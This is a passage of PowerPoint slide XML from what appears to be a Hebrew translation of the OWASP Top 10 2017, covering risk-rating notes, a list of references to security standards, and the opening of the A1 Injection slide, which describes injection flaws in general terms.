                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="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בנוסף, עדכנו את שיטת הערכת הסיכונים על-מנת לסייע בחישוב הסבירות וההשפעה של כל אחד מהסיכונים. למידע נוסף, ראה </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" dirty="0" smtClean="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hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>הערות בנוגע לסיכונים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="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a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" u="none" dirty="0" smtClean="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כל ארגון הינו ייחודי, וכך גם גורמי</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" u="none" baseline="0" dirty="0" smtClean="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 האיום עבור כל ארגון, המטרות שלהם, וההשפעה על כל פריצה. במידה וארגון בעל עניין ציבורי משתמש בתוכנת עריכת תוכן (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" u="none" baseline="0" dirty="0" smtClean="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CMS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" u="none" baseline="0" dirty="0" smtClean="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 עבור מידע ציבורי וארגון בריאות משתמש באותה תוכנת עריכת תוכן (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" u="none" baseline="0" dirty="0" smtClean="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CMS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" u="none" baseline="0" dirty="0" smtClean="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 לאחסון מידע רפואי רגיש, גורמי האיום וההשפעה העסקית עשויים להיות שונים מאוד עבור אותה תוכנה. חשוב להבין את הסיכון לארגון שלך בהתבסס על גורמי האיום וההשפעה העסקית.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" u="none" baseline="0" dirty="0" smtClean="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ככל שניתן, כותרות הסיכונים ברשימת ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" u="none" baseline="0" dirty="0" smtClean="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Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" u="none" baseline="0" dirty="0" smtClean="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 מיושרים עם חולשות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" u="none" baseline="0" dirty="0" smtClean="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hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Common Weakness Enumeration </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" u="none" baseline="0" dirty="0" smtClean="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(CWE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" u="none" baseline="0" dirty="0" smtClean="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 על-מנת לקדם שפת ביטויים אחידה ולמנוע בלבול.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="0" u="none" dirty="0" smtClean="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endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="71" name="Table 70"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3466172624"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4621087" y="4953000"/>
          <a:ext cx="2236914" cy="4426655"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2236914">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="335665">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>הפניות</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3847535">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" kern="120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OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" kern="120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hlinkClick r:id="rId8"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none" kern="120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hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" u="none" kern="120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endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none" kern="120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hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Article on Threat/Risk Modeling</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" u="none" kern="120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endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1200" b="1" dirty="0" smtClean="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הפניות חיצוניות</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1"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endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none"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hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>ISO 31000: Risk Management </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none" dirty="0" err="1">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hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Std</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" u="none"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hlinkClick r:id="rId10"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none"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hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>ISO 27001: ISMS</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none"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hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>NIST Cyber Framework (US)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" u="none"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endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none"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hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>ASD Strategic Mitigations (AU)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none"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hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>NIST CVSS 3.0</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none"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hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>Microsoft Threat Modelling Tool</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="188640" y="1646675"/>
            <a:ext cx="6480720" cy="2441968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="143635" y="5877145"/>
            <a:ext cx="4275475" cy="1170130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3211673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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="2200" dirty="0" smtClean="0"/>
              <a:t>עשרת האיומים הקריטיים על פי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2200" dirty="0" smtClean="0"/>
              <a:t> לשנת 2017</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2200" dirty="0">
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1F5308A3-3666-418A-9AE6-240E4688F2BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-685800" y="990600"/>
            <a:ext cx="8153400" cy="8001000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{200BBCDD-13C0-4D97-9CEC-01B8726246D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101033" y="1071787"/>
            <a:ext cx="5218177" cy="611796"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4">
              <a:alpha val="90000"/>
              <a:tint val="40000"/>
              <a:hueOff val="0"/>
              <a:satOff val="0"/>
              <a:lumOff val="0"/>
              <a:alphaOff val="0"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4">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36577" tIns="66441" rIns="66441" bIns="48154" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="91440" lvl="1" algn="r" defTabSz="444500" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>בעיות הזרקת קוד זדוני כגון </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NoSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, והזרקות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, קורות כאשר מידע לא מאומת נשלח לרכיב התרגום כחלק מפקודה או שאילתה. המידע העוין של התוקף עלול להטעות את רכיב התרגום ולגרום לו להפעיל פקודות לא רצויות או לגשת למידע באופן בלתי מורשה.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Freeform 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{77AB65A7-CD59-4B0C-BAB0-A853DD609B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5301114" y="1014215"/>
            <a:ext cx="1413251" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">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txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83052" tIns="60192" rIns="83052" bIns="60192" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="533400" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A1:2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - הזרקת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>קוד זדוני (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
